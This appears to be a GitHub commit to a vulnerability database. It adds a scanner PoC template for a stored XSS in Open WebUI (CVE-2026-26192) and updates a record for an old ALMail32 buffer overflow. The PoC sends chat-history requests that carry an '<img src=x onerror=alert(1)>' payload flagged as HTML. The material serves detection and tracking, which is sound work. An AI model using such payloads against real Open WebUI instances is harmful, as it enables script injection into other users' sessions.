Skip to content

Commit 2f95b4b

Browse files
committed
add: AVE-1999-0212
1 parent 6bc4743 commit 2f95b4b

2 files changed

Lines changed: 95 additions & 8 deletions

File tree

pocs/2026/POC-AVE-2026-0049.toml

Lines changed: 83 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,83 @@
1+
[info]
2+
author = "AVE"
3+
description = "检测 Open WebUI 引文预览中的存储型 XSS 漏洞(CVE-2026-26192)。攻击者通过修改聊天历史文档元数据设置 html=true,使前端将用户控制的 HTML 内容通过 srcdoc 渲染至 iFrame(sandbox=allow-scripts allow-same-origin),实现跨站脚本攻击。影响版本 <= 0.6.43,修复版本 >= 0.7.0。"
4+
id = "POC-AVE-2026-0049"
5+
name = "CVE-2026-26192 PoC"
6+
severity = "high"
7+
tags = [
8+
"cve-2026-26192",
9+
"open-webui",
10+
"xss",
11+
"stored-xss",
12+
]
13+
vuln_id = [
14+
"CVE-2026-26192",
15+
"GHSA-xc8p-9rr6-97r2",
16+
"AVE-2026-0049",
17+
]
18+
19+
[poc]
20+
logic = "any"
21+
22+
[[poc.requests]]
23+
method = "POST"
24+
path = "/{{BaseURL}}/api/chat/history"
25+
protocol = "http"
26+
27+
[poc.requests.body]
28+
content = '{"chat_id":"test","history":{"messages":[{"role":"assistant","content":"test","documents":[{"document":"<img src=x onerror=alert(1)>","metadata":{"html":true,"source":"cve-poc"}}]}]}}'
29+
type = "json"
30+
31+
[poc.requests.headers]
32+
Content-Type = "application/json"
33+
34+
[[poc.requests.matchers]]
35+
expect = true
36+
part = "body"
37+
type = "word"
38+
words = [
39+
"success",
40+
"true",
41+
]
42+
43+
[[poc.requests]]
44+
method = "PUT"
45+
path = "/{{BaseURL}}/api/chat/history"
46+
protocol = "http"
47+
48+
[poc.requests.body]
49+
content = '{"chat_id":"test","history":{"messages":[{"role":"assistant","content":"test","documents":[{"document":"<img src=x onerror=alert(1)>","metadata":{"html":true,"source":"cve-poc"}}]}]}}'
50+
type = "json"
51+
52+
[poc.requests.headers]
53+
Content-Type = "application/json"
54+
55+
[[poc.requests.matchers]]
56+
expect = true
57+
part = "body"
58+
type = "word"
59+
words = [
60+
"success",
61+
"true",
62+
]
63+
64+
[[poc.requests]]
65+
method = "POST"
66+
path = "/{{BaseURL}}/api/chat/test/history"
67+
protocol = "http"
68+
69+
[poc.requests.body]
70+
content = '{"history":{"messages":[{"role":"assistant","documents":[{"document":"<img src=x onerror=alert(1)>","metadata":{"html":true,"source":"cve-poc"}}]}]}}'
71+
type = "json"
72+
73+
[poc.requests.headers]
74+
Content-Type = "application/json"
75+
76+
[[poc.requests.matchers]]
77+
expect = true
78+
part = "body"
79+
type = "word"
80+
words = [
81+
"success",
82+
"true",
83+
]

vulns/1999/AVE-1999-0212.toml

Lines changed: 12 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,27 +1,31 @@
11
[basic]
2-
description = "CREAR ALMail32 1.10 POP3 邮件客户端存在缓冲区溢出漏洞,远程攻击者可通过向目标用户发送包含特制 From 或 To 头部的恶意邮件触发该漏洞,导致拒绝服务或可能在目标系统上执行任意代码。攻击者无需身份认证,只需诱使用户连接 POP3 服务器接收邮件即可利用"
3-
published = "1999-08-08T04:00:00.000"
4-
remediation = "CREAR 已停止维护 ALMail32,无官方补丁。建议立即卸载 ALMail32 1.10,迁移至仍在安全维护的现代邮件客户端(如 Thunderbird 或 Outlook)。若因业务原因无法立即替换,可在邮件网关/服务器侧配置规则,拦截或截断超长 From/To 头部(超过 1024 字节)的邮件,并避免在 ALMail32 中打开来路不明的邮件"
2+
description = "CREAR ALMail32 1.10 POP3 客户端在解析邮件头时存在缓冲区溢出漏洞。远程攻击者可通过向目标用户发送特制的包含超长 From 或 To 头的电子邮件触发该漏洞,导致拒绝服务或任意代码执行。攻击条件为需要诱使用户使用受影响的客户端接收并查看恶意邮件"
3+
published = "1999-08-08"
4+
remediation = "该漏洞影响 CREAR ALMail32 1.10 及更早版本,厂商已停止维护且无官方补丁。建议立即停用 ALMail32,迁移至现代受支持的 POP3 客户端(如 Mozilla Thunderbird、Claws Mail),并在邮件服务器网关侧配置过滤异常超长 From/To 邮件头字段的规则作为临时缓解措施"
55
score = 5.1
66
severity = "MEDIUM"
7-
sources = ["cve"]
7+
sources = [
8+
"cve",
9+
"avd",
10+
]
811
title = "CREAR ALMail32 POP3 客户端缓冲区溢出漏洞"
9-
updated = "2026-06-16T21:48:49.103"
12+
updated = "2026-06-16"
1013

1114
[exploit]
12-
exp_urls = []
13-
poc_urls = []
15+
exp_urls = ["https://www.exploit-db.com/exploits/19450"]
16+
poc_urls = ["https://www.exploit-db.com/exploits/19450"]
1417

1518
[id]
1619
aliases = ["CVE-1999-0673"]
1720
ave_id = "AVE-1999-0212"
1821

1922
[meta]
20-
collected_at = "2026-07-13T00:00:00Z"
23+
collected_at = "2026-07-14T00:00:00Z"
2124
status = "completed"
2225

2326
[references]
2427
urls = [
2528
"http://www.securityfocus.com/bid/574",
2629
"https://www.exploit-db.com/exploits/19450",
30+
"https://github.com/github/advisory-database/blob/3f4ce19e2c9952be92df5da9390e93383644298b/advisories/unreviewed/2022/04/GHSA-g7pc-52xr-cv98/GHSA-g7pc-52xr-cv98.json",
2731
]

0 commit comments

Comments
 (0)